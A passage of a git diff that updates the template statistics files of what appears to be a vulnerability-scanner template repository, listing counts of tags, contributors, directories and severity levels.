sherif","count":1},{"name":"carrot2","count":1},{"name":"exid","count":1},{"name":"tirtha_mandal","count":1},{"name":"knassar702","count":1},{"name":"patralos","count":1},{"name":"alevsk","count":1},{"name":"davidfegyver","count":1},{"name":"tea","count":1},{"name":"ahmetpergamum","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"iampritam","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"hanlaomo","count":1},{"name":"borna nematzadeh","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"mrharshvardhan","count":1},{"name":"apt-mirror","count":1},{"name":"sshell","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"rotemreiss","count":1},{"name":"igibanez","count":1},{"name":"0ut0fb4nd","count":1},{"name":"jeya.seelan","count":1},{"name":"manasmbellani","count":1},{"name":"osamahamad","count":1},{"name":"jas37","count":1},{"name":"aron molnar","count":1},{"name":"affix","count":1},{"name":"mukundbhuva","count":1},{"name":"booboohq","count":1},{"name":"manuelbua","count":1},{"name":"nytr0gen","count":1},{"name":"alperenkesk","count":1},{"name":"fopina","count":1},{"name":"unp4ck","count":1},{"name":"opencirt","count":1},{"name":"arall","count":1},{"name":"piyushchhiroliya","count":1},{"name":"ndmalc","count":1},{"name":"yavolo","count":1},{"name":"akshansh","count":1},{"name":"rschio","count":1},{"name":"queencitycyber","count":1},{"name":"official_blackhat13","count":1},{"name":"juicypotato1","count":1},{"name":"aayush vishnoi","count":1},{"name":"jub0bs","count":1},{"name":"alexrydzak","count":1},{"name":"zandros0","count":1},{"name":"arr0way","count":1},{"name":"blckraven","count":1},{"name":"luqmaan hadia","count":1},{"name":"xeldax","count":1},{"name":"clment cruchet","count":1},{"name":"freakyclown","count":1},{"name":"notsoevilweasel","count":1},{"name":"arjunchandarana","count":1},{"name":"mr. bobo hp","count":1},{"name":"justmumu","count":1},{"name":"omarkurt","count":1},{"name":"toufik-airane","count":1},{"name":"kchason","count":1},{"name":"myst7ic","count":1},{"name":"hardik-rathod","count":1},{"name":"d0rkerdevil","count":1},{"name":"8authur","count":1},{"name":"hazana","count":1},{"name":"ooooooo_q","count":1},{"name":"dhiyaneshdki","count":1},{"name":"guax1","count":1},{"name":"lixts","count":1},{"name":"kr1shna4garwal","count":1},{"name":"dk999","count":1},{"name":"hakluke","count":1},{"name":"philippdelteil","count":1},{"name":"infosecsanyam","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"remonsec","count":1},{"name":"thelicato","count":1},{"name":"couskito","count":1},{"name":"udinchan","count":1},{"name":"co0nan","count":1},{"name":"chesterblue","count":1},{"name":"shockwave","count":1},{"name":"kagamigawa","count":1},{"name":"kaizensecurity","count":1},{"name":"furkansenan","count":1},{"name":"esonhugh","count":1},{"name":"furkansayim","count":1},{"name":"failopen","count":1},{"name":"lamscun","count":1},{"name":"kurohost","count":1},{"name":"mhdsamx","count":1},{"name":"elmahdi","count":1},{"name":"nielsing","count":1},{"name":"alex","count":1},{"name":"pry0cc","count":1},{"name":"aravind","count":1},{"name":"spac3wh1te","count":1},{"name":"undefl0w","count":1},{"name":"amanrawat","count":1},{"name":"y0no","count":1},{"name":"s1r1u5_","count":1},{"name":"andysvints","count":1},{"name":"dwbzn","count":1},{"name":"dawid-czarnecki","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"viniciuspereiras","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"zsusac","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"pudsec","count":1},{"name":"_c0wb0y_","count":1},{"name":"mass0ma","count":1},{"name":"imhunterand","count":1},{"name":"0xceeb","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"tim_koopmans","count":1},{"name":"erethon","count":1},{"name":"mabdullah22","count":1},{"name":"jbertman","count":1},{"name":"sleepingbag945","count":1},{"name":"berkdusunur","count":1},{"name":"sherlocksecurity","count":1},{"name":"lethargynavigator","count":1},{"name":"ransomsec","count":1},{"name":"sinsinology","count":1},{"name":"irshadahamed","count":1},{"name":"flag007","count":1},{"name":"shifacyclewla","count":1},{"name":"mbmy","count":1},{"name":"izn0u","count":1},{"name":"tarunkoyalwar","count":1},{"name":"jbaines-r7","count":1},{"name":"pascalheidmann","count":1},{"name":"deena","count":1},{"name":"keni0k","count":1},{"name":"0xh7ml","count":1},{"name":"jrolf","count":1},{"name":"jaimin gondaliya","count":1},{"name":"xshuden","count":1},{"name":"jc175","count":1},{"name":"willd96","count":1},{"name":"kiks7","count":1},{"name":"j33n1k4","count":1},{"name":"ldionmarcil","count":1},{"name":"calumjelrick","count":1},{"name":"fmunozs","count":1},{"name":"lingtren","count":1},{"name":"soyelmago","count":1},{"name":"bywalks","count":1},{"name":"thebinitghimire","count":1},{"name":"ling","count":1},{"name":"paper-pen","count":1},{"name":"af001","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"revblock","count":1},{"name":"sak1","count":1},{"name":"secthebit","count":1},{"name":"allenwest24","count":1},{"name":"adrianmf","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"2rs3c","count":1},{"name":"shiar","count":1},{"name":"husain","count":1},{"name":"michael wedl","count":1},{"name":"petergrifin","count":1},{"name":"wabafet","count":1},{"name":"ptonewreckin","count":1},{"name":"r3nz0","count":1},{"name":"akash.c","count":1},{"name":"th3.d1p4k","count":1},{"name":"chron0x","count":1},{"name":"orpheus","count":1},{"name":"shiva (strobes security)","count":1},{"name":"b4uh0lz","count":1},{"name":"thevillagehacker","count":1},{"name":"topscoder","count":1},{"name":"bugvsme","count":1},{"name":"shivampand3y","count":1},{"name":"dabla","count":1},{"name":"jna1","count":1},{"name":"ayadi","count":1},{"name":"jeya seelan","count":1},{"name":"danigoland","count":1},{"name":"arliya","count":1},{"name":"marcio mendes","count":1},{"name":"iphantasmic","count":1},{"name":"galoget","count":1},{"name":"bughuntersurya","count":1},{"name":"nerrorsec","count":1},{"name":"luskabol","count":1},{"name":"w0tx","count":1},{"name":"anon-artist","count":1},{"name":"f1she3","count":1},{"name":"zinminphy0","count":1},{"name":"mubassirpatel","count":1},{"name":"rodnt","count":1},{"name":"pratik khalane","count":1},{"name":"lark lab","count":1},{"name":"th3r4id","count":1},{"name":"_darrenmartyn","count":1},{"name":"xstp","count":1},{"name":"charanrayudu","count":1},{"name":"gpiechnik2","count":1}],"directory":[{"name":"http","count":6050},{"name":"workflows","count":190},{"name":"file","count":142},{"name":"network","count":100},{"name":"ssl","count":24},{"name":"dns","count":18},{"name":"headless","count":9},{"name":"contributors.json","count":1},{"name":"cves.json","count":1},{"name":"TEMPLATES-STATS.json","count":1}],"severity":[{"name":"info","count":2941},{"name":"high","count":1312},{"name":"medium","count":1114},{"name":"critical","count":725},{"name":"low","count":224},{"name":"unknown","count":27}],"types":[{"name":"file","count":142},{"name":"dns","count":18}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 4f78107c8a..142fb0d482 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,19 +1,19 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 1949 | dhiyaneshdk | 907 | http | 6047 | info | 2940 | file | 142 | -| panel | 958 | dwisiswant0 | 797 | workflows | 190 | high | 1312 | dns | 18 | -| wordpress | 802 | daffainfo | 664 | file | 142 | medium | 1113 | | | -| exposure | 719 | pikpikcu | 353 | network | 100 | critical | 724 | | | -| xss | 695 | pdteam | 280 | ssl | 24 | low | 224 | | | +| cve | 1951 | dhiyaneshdk | 907 | http | 6050 | info | 2941 | file | 142 | +| panel | 959 | dwisiswant0 | 797 | workflows | 190 | high | 1312 | dns | 18 | +| wordpress | 802 | daffainfo | 664 | file | 142 | medium | 1114 | | | +| exposure | 719 | pikpikcu | 353 | network | 100 | critical | 725 | | | +| xss | 696 | pdteam | 280 | ssl | 24 | low | 224 | | | | wp-plugin | 691 | pussycat0x | 261 | dns | 18 | unknown | 27 | | | | osint | 652 | geeknik | 221 | headless | 9 | | | | | -| tech | 618 | ricardomaia | 220 | contributors.json | 1 | | | | | -| edb | 598 | ritikchaddha | 218 | TEMPLATES-STATS.json | 1 | | | | | +| tech | 618 | ricardomaia | 220 | TEMPLATES-STATS.json | 1 | | | | | +| edb | 598 | ritikchaddha | 218 | contributors.json | 1 | | | | | | lfi | 558 | 0x_akoko | 179 | cves.json | 1 | | | | | | misconfig | 474 | theamanrawat | 177 | | | | | | | | cve2021 | 434 | princechaddha | 156 | | | | | | | -| rce | 430 | gy741 | 145 | | | | | | | -| cve2022 | 417 | arafatansari | 119 | | | | | | | +| rce | 431 | gy741 | 145 | | | | | | | +| cve2022 | 418 | arafatansari | 119 | | | | | | | | packetstorm | 369 | tess | 109 | | | | | | | | wpscan | 350 | r3y3r53 | 80 | | | | | | | | wp | 303 | madrobot | 65 | | | | | | | @@ -21,3473 +21,3475 @@ | cve2020 | 242 | idealphase | 63 | | | | | | | | token-spray | 240 | akincibor | 58 | | | | | | | | authenticated | 233 | for3stco1d | 55 | | | | | | | -| sqli | 210 | gaurang | 42 | | | | | | | -| top-200 | 208 | philippedelteil | 41 | | | | | | | -| osint-social | 207 | righettod | 41 | | | | | | | +| sqli | 211 | gaurang | 42 | | | | | | | +| top-200 | 208 | righettod | 41 | | | | | | | +| osint-social | 207 | philippedelteil | 41 | | | | | | | | kev | 200 | edoardottt | 40 | | | | | | | -| config | 197 | pdresearch | 39 | | | | | | | +| config | 197 | pdresearch | 40 | | | | | | | | | 194 | c-sh0 | 35 | | | | | | | | oast | 171 | adam crosser | 31 | | | | | | | -| token | 160 | iamnoooob | 29 | | | | | | | -| apache | 153 | rootxharsh | 28 | | | | | | | +| token | 160 | iamnoooob | 30 | | | | | | | +| apache | 153 | rootxharsh | 29 | | | | | | | | cve2018 | 151 | ice3man | 26 | | | | | | | -| default-login | 150 | hardik-solanki | 24 | | | | | | | | iot | 150 | organiccrap | 24 | | | | | | | -| cve2019 | 149 | pwnhxl | 24 | | | | | | | -| file | 147 | johnk3r | 23 | | | | | | | -| login | 140 | techbrunchfr | 23 | | | | | | | -| joomla | 136 | j4vaovo | 22 | | | | | | | -| redirect | 116 | ffffffff0x | 22 | | | | | | | -| cve2023 | 116 | sullo | 18 | | | | | | | +| default-login | 150 | pwnhxl | 24 | | | | | | | +| cve2019 | 149 | hardik-solanki | 24 | | | | | | | +| file | 147 | techbrunchfr | 23 | | | | | | | +| login | 141 | johnk3r | 23 | | | | | | | +| joomla | 136 | ffffffff0x | 22 | | | | | | | +| cve2023 | 117 | j4vaovo | 22 | | | | | | | +| redirect | 116 | sullo | 18 | | | | | | | | cve2010 | 112 | cckuailong | 18 | | | | | | | | files | 101 | ctflearner | 16 | | | | | | | -| network | 100 | parthmalhotra | 16 | | | | | | | -| top-100 | 100 | lu4nx | 15 | | | | | | | -| router | 97 | pr3r00t | 15 | | | | | | | -| ssrf | 96 | random-robbie | 15 | | | | | | | -| cms | 95 | sheikhrishad | 15 | | | | | | | +| top-100 | 100 | parthmalhotra | 16 | | | | | | | +| network | 100 | sheikhrishad | 15 | | | | | | | +| router | 97 | lu4nx | 15 | | | | | | | +| ssrf | 96 | pr3r00t | 15 | | | | | | | +| cms | 95 | random-robbie | 15 | | | | | | | | auth-bypass | 81 | milo2012 | 14 | | | | | | | | cve2017 | 77 | r3dg33k | 14 | | | | | | | -| devops | 77 | tenbird | 13 | | | | | | | -| takeover | 73 | theabhinavgaur | 13 | | | | | | | -| intrusive | 72 | 0ri2n | 13 | | | | | | | -| install | 70 | sharath | 13 | | | | | | | -| disclosure | 68 | melbadry9 | 13 | | | | | | | +| devops | 77 | theabhinavgaur | 13 | | | | | | | +| intrusive | 73 | sharath | 13 | | | | | | | +| takeover | 73 | tenbird | 13 | | | | | | | +| install | 70 | melbadry9 | 13 | | | | | | | +| disclosure | 68 | 0ri2n | 13 | | | | | | | | oracle | 65 | suman_kar | 12 | | | | | | | -| seclists | 60 | elsfa7110 | 11 | | | | | | | +| seclists | 60 | wdahlenb | 11 | | | | | | | | detect | 58 | cyllective | 11 | | | | | | | -| oss | 57 | wdahlenb | 11 | | | | | | | -| cve2015 | 54 | dogasantos | 11 | | | | | | | -| cisco | 53 | random_robbie | 10 | | | | | | | -| google | 53 | 0xpugazh | 10 | | | | | | | -| cve2016 | 52 | logicalhunter | 10 | | | | | | | -| adobe | 52 | co5mos | 10 | | | | | | | -| fileupload | 49 | alph4byt3 | 10 | | | | | | | -| atlassian | 47 | meme-lord | 10 | | | | | | | -| logs | 46 | nadino | 10 | | | | | | | -| tenable | 46 | hackergautam | 10 | | | | | | | -| vmware | 45 | harsh | 9 | | | | | | | -| osint-gaming | 45 | 0x240x23elu | 9 | | | | | | | -| vulhub | 44 | emadshanab | 9 | | | | | | | -| aem | 44 | nullfuzz | 9 | | | | | | | -| debug | 44 | oppsec | 9 | | | | | | | -| plugin | 43 | fabaff | 9 | | | | | | | -| osint-porn | 42 | _0xf4n9x_ | 8 | | | | | | | +| oss | 57 | dogasantos | 11 | | | | | | | +| cve2015 | 54 | elsfa7110 | 11 | | | | | | | +| cisco | 53 | alph4byt3 | 10 | | | | | | | +| google | 53 | nadino | 10 | | | | | | | +| cve2016 | 52 | hackergautam | 10 | | | | | | | +| adobe | 52 | random_robbie | 10 | | | | | | | +| fileupload | 49 | co5mos | 10 | | | | | | | +| atlassian | 47 | 0xpugazh | 10 | | | | | | | +| tenable | 46 | logicalhunter | 10 | | | | | | | +| logs | 46 | meme-lord | 10 | | | | | | | +| osint-gaming | 45 | harsh | 10 | | | | | | | +| vmware | 45 | fabaff | 9 | | | | | | | +| aem | 44 | 0x240x23elu | 9 | | | | | | | +| vulhub | 44 | oppsec | 9 | | | | | | | +| debug | 44 | emadshanab | 9 | | | | | | | +| plugin | 43 | nullfuzz | 9 | | | | | | | | osint-hobby | 42 | olearycrew | 8 | | | | | | | -| hackerone | 42 | aashiq | 8 | | | | | | | -| cve2014 | 42 | veshraj | 8 | | | | | | | -| huntr | 41 | zh | 8 | | | | | | | -| generic | 37 | that_juan_ | 8 | | | | | | | -| traversal | 37 | iamthefrogy | 8 | | | | | | | -| springboot | 36 | kophjager007 | 7 | | | | | | | -| jira | 36 | techryptic (@tech) | 7 | | | | | | | -| osint-misc | 35 | divya_mudgal | 7 | | | | | | | -| kubernetes | 35 | its0x08 | 7 | | | | | | | -| aws | 35 | dr_set | 7 | | | | | | | -| injection | 34 | leovalcante | 7 | | | | | | | -| listing | 33 | adamcrosser | 7 | | | | | | | -| misc | 31 | amit-jd | 7 | | | | | | | -| deserialization | 31 | harshbothra_ | 7 | | | | | | | -| cnvd | 29 | randomstr1ng | 7 | | | | | | | -| sap | 29 | me_dheeraj | 7 | | | | | | | +| hackerone | 42 | iamthefrogy | 8 | | | | | | | +| cve2014 | 42 | zh | 8 | | | | | | | +| osint-porn | 42 | that_juan_ | 8 | | | | | | | +| huntr | 41 | aashiq | 8 | | | | | | | +| generic | 37 | _0xf4n9x_ | 8 | | | | | | | +| traversal | 37 | veshraj | 8 | | | | | | | +| springboot | 36 | randomstr1ng | 7 | | | | | | | +| jira | 36 | its0x08 | 7 | | | | | | | +| osint-misc | 35 | me_dheeraj | 7 | | | | | | | | | | (https://twitter.com/dheerajmadhukar) | | | | | | | | -| osint-coding | 29 | caspergn | 7 | | | | | | | -| log4j | 28 | clem9669 | 6 | | | | | | | -| osint-tech | 28 | imnightmaree | 6 | | | | | | | -| gitlab | 27 | forgedhallpass | 6 | | | | | | | -| php | 27 | pathtaga | 6 | | | | | | | -| microsoft | 26 | pentest_swissky | 6 | | | | | | | -| proxy | 26 | praetorian-thendrickson | 6 | | | | | | | -| fuzz | 25 | evan rubinstein | 6 | | | | | | | -| cve2012 | 25 | puzzlepeaches | 6 | | | | | | | -| api | 25 | justaacat | 6 | | | | | | | -| jndi | 25 | noraj | 6 | | | | | | | -| osint-business | 24 | ja1sh | 6 | | | | | | | -| osint-images | 24 | xelkomy | 6 | | | | | | | -| osint-shopping | 24 | gitlab red team | 6 | | | | | | | -| manageengine | 24 | nodauf | 6 | | | | | | | -| osint-finance | 24 | devang-solanki | 6 | | | | | | | -| firewall | 24 | __fazal | 6 | | | | | | | -| k8s | 23 | r12w4n | 5 | | | | | | | -| stored-xss | 23 | ganofins | 5 | | | | | | | -| zoho | 23 | panch0r3d | 5 | | | | | | | -| c2 | 23 | vicrack | 5 | | | | | | | -| amazon | 23 | defr0ggy | 5 | | | | | | | -| wp-theme | 22 | kh4sh3i | 5 | | | | | | | -| ibm | 21 | prajiteshsingh | 5 | | | | | | | -| msf | 21 | yanyun | 5 | | | | | | | -| weblogic | 21 | irshad ahamed | 5 | | | | | | | -| cloud | 21 | joanbono | 5 | | | | | | | -| tomcat | 21 | robotshell | 5 | | | | | | | -| fortinet | 20 | mr-xn | 5 | | | | | | | -| cicd | 20 | podalirius | 5 | | | | | | | -| struts | 19 | s0obi | 5 | | | | | | | -| ssl | 19 | incogbyte | 4 | | | | | | | -| admin | 19 | tanq16 | 4 | | | | | | | -| github | 19 | kazet | 4 | | | | | | | -| dlink | 19 | dadevel | 4 | | | | | | | -| camera | 19 | bhutch | 4 | | | | | | | -| dns | 19 | dolev farhi | 4 | | | | | | | -| jenkins | 19 | powerexploit | 4 | | | | | | | -| rukovoditel | 19 | r3naissance | 4 | | | | | | | -| lfr | 18 | wisnupramoedya | 4 | | | | | | | -| osint-music | 18 | shine | 4 | | | | | | | -| service | 18 | scent2d | 4 | | | | | | | -| ftp | 18 | 3th1c_yuk1 | 4 | | | | | | | -| wavlink | 18 | e_schultze_ | 4 | | | | | | | -| cve2011 | 17 | mastercho | 4 | | | | | | | -| ir | 17 | h1ei1 | 4 | | | | | | | -| printer | 16 | impramodsargar | 3 | | | | | | | -| nginx | 16 | 0w4ys | 3 | | | | | | | -| osint-blog | 16 | f1tz | 3 | | | | | | | -| backup | 16 | mavericknerd | 3 | | | | | | | -| xxe | 16 | ph33r | 3 | | | | | | | -| cve2009 | 16 | huowuzhao | 3 | | | | | | | -| android | 15 | taielab | 3 | | | | | | | -| magento | 15 | hahwul | 3 | | | | | | | -| citrix | 15 | johnjhacking | 3 | | | | | | | -| java | 15 | skeltavik | 3 | | | | | | | -| status | 15 | evergreencartoons | 3 | | | | | | | -| cve2008 | 15 | canberbamber | 3 | | | | | | | -| hp | 15 | sushantkamble | 3 | | | | | | | -| jboss | 14 | yuzhe-zhang-0 | 3 | | | | | | | -| confluence | 14 | jarijaas | 3 | | | | | | | -| woocommerce | 14 | _generic_human_ | 3 | | | | | | | -| audit | 14 | k0pak4 | 3 | | | | | | | -| nodejs | 14 | matt galligan | 3 | | | | | | | -| zyxel | 14 | dudez | 3 | | | | | | | -| osint-health | 14 | lark-lab | 3 | | | | | | | -| mail | 14 | whoever | 3 | | | | | | | -| osint-art | 14 | shifacyclewala | 3 | | | | | | | -| cve2013 | 14 | alifathi-h1 | 3 | | | | | | | -| domainmod | 14 | vsh00t | 3 | | | | | | | -| tokens | 13 | bernardofsr | 3 | | | | | | | -| cuppa | 13 | swissky | 3 | | | | | | | -| azure | 13 | fyoorer | 3 | | | | | | | -| laravel | 13 | davidmckennirey | 3 | | | | | | | -| fortigate | 13 | thomas_from_offensity | 3 | | | | | | | -| abstractapi | 13 | vagnerd | 3 | | | | | | | -| creds-stuffing | 13 | fxploit | 3 | | | | | | | -| osint-dating | 13 | andydoering | 3 | | | | | | | -| npm | 13 | lucasljm2001 | 3 | | | | | | | -| login-check | 13 | emenalf | 3 | | | | | | | -| osint-political | 13 | arcc | 3 | | | | | | | -| vpn | 12 | z3bd | 3 | | | | | | | -| dashboard | 12 | arm!tage | 3 | | | | | | | -| netsweeper | 12 | binaryfigments | 3 | | | | | | | -| netgear | 12 | cheesymoon | 3 | | | | | | | -| microweber | 12 | true13 | 3 | | | | | | | -| ruby | 12 | splint3r7 | 3 | | | | | | | -| airflow | 12 | badboycxcc | 3 | | | | | | | -| rails | 12 | ambassify | 3 | | | | | | | -| git | 12 | me9187 | 3 | | | | | | | -| webserver | 12 | unstabl3 | 3 | | | | | | | -| drupal | 12 | dr0pd34d | 3 | | | | | | | -| graphql | 12 | ekrause | 3 | | | | | | | -| grafana | 12 | atomiczsec | 3 | | | | | | | -| kafka | 12 | yash anand @yashanand155 | 3 | | | | | | | -| ruijie | 12 | heeress | 2 | | | | | | | -| auth | 12 | uomogrande | 2 | | | | | | | -| backdoor | 12 | brenocss | 2 | | | | | | | -| enum | 12 | nvn1729 | 2 | | | | | | | -| osint-video | 11 | lotusdll | 2 | | | | | | | -| setup | 11 | sbani | 2 | | | | | | | -| xstream | 11 | randomdhiraj | 2 | | | | | | | -| dell | 11 | paperpen | 2 | | | | | | | -| online-fire-reporting | 11 | danielmofer | 2 | | | | | | | -| sonicwall | 11 | pxmme1337 | 2 | | | | | | | -| cnvd2021 | 11 | zomsop82 | 2 | | | | | | | -| phpmyadmin | 11 | vavkamil | 2 | | | | | | | -| coldfusion | 11 | cocxanh | 2 | | | | | | | -| cisa | 11 | convisoappsec | 2 | | | | | | | -| docker | 11 | gtrrnr | 2 | | | | | | | -| glpi | 10 | hackerarpan | 2 | | | | | | | -| symfony | 10 | kre80r | 2 | | | | | | | -| thinkphp | 10 | k11h-de | 2 | | | | | | | -| django | 10 | thardt-praetorian | 2 | | | | | | | -| jolokia | 10 | 0xcrypto | 2 | | | | | | | -| dedecms | 10 | clarkvoss | 2 | | | | | | | -| zimbra | 10 | ree4pwn | 2 | | | | | | | -| db | 10 | ajaysenr | 2 | | | | | | | -| digitalocean | 10 | 666asd | 2 | | | | | | | -| solarview | 10 | coldfish | 2 | | | | | | | -| spring | 10 | w4cky_ | 2 | | | | | | | -| headless | 10 | luci | 2 | | | | | | | -| ssti | 10 | sascha brendel | 2 | | | | | | | -| ssh | 10 | ggranjus | 2 | | | | | | | -| prometheus | 9 | nybble04 | 2 | | | | | | | -| osint-news | 9 | dbrwsky | 2 | | | | | | | -| opencats | 9 | ehsahil | 2 | | | | | | | -| vcenter | 9 | myztique | 2 | | | | | | | -| redis | 9 | korteke | 2 | | | | | | | -| alibaba | 9 | 0xelkomy | 2 | | | | | | | -| versa | 9 | z0ne | 2 | | | | | | | -| fastjson | 9 | geekby | 2 | | | | | | | -| installer | 9 | joshlarsen | 2 | | | | | | | -| sitecore | 9 | nkxxkn | 2 | | | | | | | -| wso2 | 9 | paradessia | 2 | | | | | | | -| firebase | 9 | israel comazzetto dos reis | 2 | | | | | | | -| kube | 9 | joeldeleep | 2 | | | | | | | -| bypass | 9 | wa1tf0rme | 2 | | | | | | | -| pfsense | 9 | randomrobbie | 2 | | | | | | | -| cache | 9 | 0xsmiley | 2 | | | | | | | -| zabbix | 9 | y4er | 2 | | | | | | | -| gitea | 9 | j3ssie | 2 | | | | | | | -| windows | 9 | g4l1t0 | 2 | | | | | | | -| node | 9 | nuk3s3c | 2 | | | | | | | -| scada | 9 | github.com/its0x08 | 2 | | | | | | | -| iis | 9 | smaranchand | 2 | | | | | | | -| ognl | 8 | foulenzer | 2 | | | | | | | -| exchange | 8 | hetroublemakr | 2 | | | | | | | -| vbulletin | 8 | 0xnirvana | 2 | | | | | | | -| mirai | 8 | raesene | 2 | | | | | | | -| bucket | 8 | streetofhackerr007 | 2 | | | | | | | -| atom | 8 | 0xrudra | 2 | | | | | | | -| cisco-switch | 8 | udit_thakkur | 2 | | | | | | | -| jetbrains | 8 | c3l3si4n | 2 | | | | | | | -| config-audit | 8 | socketz | 2 | | | | | | | -| ecology | 8 | 0xsapra | 2 | | | | | | | -| cnvd2020 | 8 | dheerajmadhukar | 2 | | | | | | | -| druid | 8 | dahse89 | 2 | | | | | | | -| metadata | 8 | ricardo maia (brainfork) | 2 | | | | | | | -| crlf | 8 | m4lwhere | 2 | | | | | | | -| icewarp | 8 | moritz nentwig | 2 | | | | | | | -| smtp | 8 | parth | 2 | | | | | | | -| solr | 8 | bananabr | 2 | | | | | | | -| elasticsearch | 8 | v0idc0de | 2 | | | | | | | -| hms | 8 | kiblyn11 | 2 | | | | | | | -| emerge | 8 | supras | 2 | | | | | | | -| spotweb | 8 | kishore-hariram | 2 | | | | | | | -| console | 8 | brucelsone | 2 | | | | | | | -| unauthenticated | 8 | d4vy | 2 | | | | | | | -| oauth | 8 | lum8rjack | 2 | | | | | | | -| recon | 8 | n-thumann | 2 | | | | | | | -| keys | 8 | mohammedsaneem | 2 | | | | | | | -| default-page | 8 | koti2 | 2 | | | | | | | -| shopify | 7 | afaq | 2 | | | | | | | -| squirrelmail | 7 | bp0lr | 2 | | | | | | | -| nagiosxi | 7 | 0xprial | 2 | | | | | | | -| error | 7 | megamansec | 2 | | | | | | | -| nagios | 7 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| go | 7 | bing0o | 2 | | | | | | | -| blind | 7 | rafaelwdornelas | 2 | | | | | | | -| malware | 7 | gal nagli | 2 | | | | | | | -| huawei | 7 | martincodes-de | 2 | | | | | | | -| maps | 7 | redteambrasil | 2 | | | | | | | -| ec2 | 7 | dogancanbakir | 2 | | | | | | | -| gogs | 7 | amsda | 2 | | | | | | | -| sophos | 7 | sinkettu | 2 | | | | | | | -| seeyon | 7 | manas_harsh | 2 | | | | | | | -| websphere | 7 | bsysop | 2 | | | | | | | -| vms | 7 | shelled | 2 | | | | | | | -| ofbiz | 7 | gevakun | 2 | | | | | | | -| avtech | 7 | joshua rogers | 2 | | | | | | | -| manager | 7 | codexlynx | 2 | | | | | | | -| samsung | 7 | cckuakilong | 2 | | | | | | | -| fortios | 7 | x1m_martijn | 2 | | | | | | | -| odoo | 7 | thezakman | 2 | | | | | | | -| jeecg | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| database | 6 | 8arthur | 2 | | | | | | | -| liferay | 6 | sy3omda | 2 | | | | | | | -| symantec | 6 | maximus decimus | 2 | | | | | | | -| leak | 6 | notnotnotveg | 2 | | | | | | | -| mongodb | 6 | fopina | 1 | | | | | | | -| microstrategy | 6 | qlkwej | 1 | | | | | | | -| s3 | 6 | ola456 | 1 | | | | | | | -| jetty | 6 | skylark-lab | 1 | | | | | | | -| kubelet | 6 | omarjezi | 1 | | | | | | | -| activemq | 6 | 1nf1n7y | 1 | | | | | | | -| rconfig | 6 | spac3wh1te | 1 | | | | | | | -| slack | 6 | exid | 1 | | | | | | | -| magmi | 6 | juliosmelo | 1 | | | | | | | -| openvpn | 6 | bartu utku sarp | 1 | | | | | | | -| zhiyuan | 6 | natto97 | 1 | | | | | | | -| tikiwiki | 6 | ahmed sherif | 1 | | | | | | | -| lucee | 6 | elmahdi | 1 | | | | | | | -| filemanager | 6 | sicksec | 1 | | | | | | | -| opensis | 6 | mass0ma | 1 | | | | | | | -| moodle | 6 | ringo | 1 | | | | | | | -| nexus | 6 | opencirt | 1 | | | | | | | -| python | 6 | osamahamad | 1 | | | | | | | -| plesk | 6 | bibeksapkota (sar00n) | 1 | | | | | | | -| keycloak | 6 | petergrifin | 1 | | | | | | | -| doctor-appointment-system | 6 | hazana | 1 | | | | | | | -| pmb | 6 | 0h1in9e | 1 | | | | | | | -| secret | 6 | iampritam | 1 | | | | | | | -| minio | 6 | jas37 | 1 | | | | | | | -| fpd | 6 | udyz | 1 | | | | | | | -| newrelic | 6 | alperenkesk | 1 | | | | | | | -| cobbler | 6 | tirtha | 1 | | | | | | | -| jamf | 6 | mrharshvardhan | 1 | | | | | | | -| solarwinds | 6 | unp4ck | 1 | | | | | | | -| bigip | 6 | thebinitghimire | 1 | | | | | | | -| artica | 6 | queencitycyber | 1 | | | | | | | -| elfinder | 6 | official_blackhat13 | 1 | | | | | | | -| adminer | 5 | alexrydzak | 1 | | | | | | | -| facebook | 5 | thevillagehacker | 1 | | | | | | | -| akamai | 5 | paper-pen | 1 | | | | | | | -| rseenet | 5 | 5up3r541y4n | 1 | | | | | | | -| cacti | 5 | dhiyaneshdki | 1 | | | | | | | -| caucho | 5 | sec_hawk | 1 | | | | | | | -| resin | 5 | zsusac | 1 | | | | | | | -| asp | 5 | hexcat | 1 | | | | | | | -| metinfo | 5 | geraldino2 | 1 | | | | | | | -| ruckus | 5 | th3.d1p4k | 1 | | | | | | | -| avaya | 5 | viniciuspereiras | 1 | | | | | | | -| hybris | 5 | igibanez | 1 | | | | | | | -| hikvision | 5 | pjborah | 1 | | | | | | | -| hashicorp | 5 | r3nz0 | 1 | | | | | | | -| awstats | 5 | th3r4id | 1 | | | | | | | -| square | 5 | retr0 | 1 | | | | | | | -| rfi | 5 | calumjelrick | 1 | | | | | | | -| cockpit | 5 | xstp | 1 | | | | | | | -| carrental | 5 | allenwest24 | 1 | | | | | | | -| fatpipe | 5 | jaskaran | 1 | | | | | | | -| typo3 | 5 | daviey | 1 | | | | | | | -| 74cms | 5 | 0xceeb | 1 | | | | | | | -| vrealize | 5 | irshadahamed | 1 | | | | | | | -| elastic | 5 | lethargynavigator | 1 | | | | | | | -| strapi | 5 | 2rs3c | 1 | | | | | | | -| sql | 5 | kailashbohara | 1 | | | | | | | -| gocd | 5 | aceseven (digisec360) | 1 | | | | | | | -| storage | 5 | manasmbellani | 1 | | | | | | | -| nacos | 5 | noamrathaus | 1 | | | | | | | -| circarlife | 5 | ph33rr | 1 | | | | | | | -| microfocus | 5 | manuelbua | 1 | | | | | | | -| paypal | 5 | amnotacat | 1 | | | | | | | -| firmware | 5 | kr1shna4garwal | 1 | | | | | | | -| parallels | 5 | mzack9999 | 1 | | | | | | | -| asana | 5 | aresx | 1 | | | | | | | -| prestashop | 5 | carlosvieira | 1 | | | | | | | -| 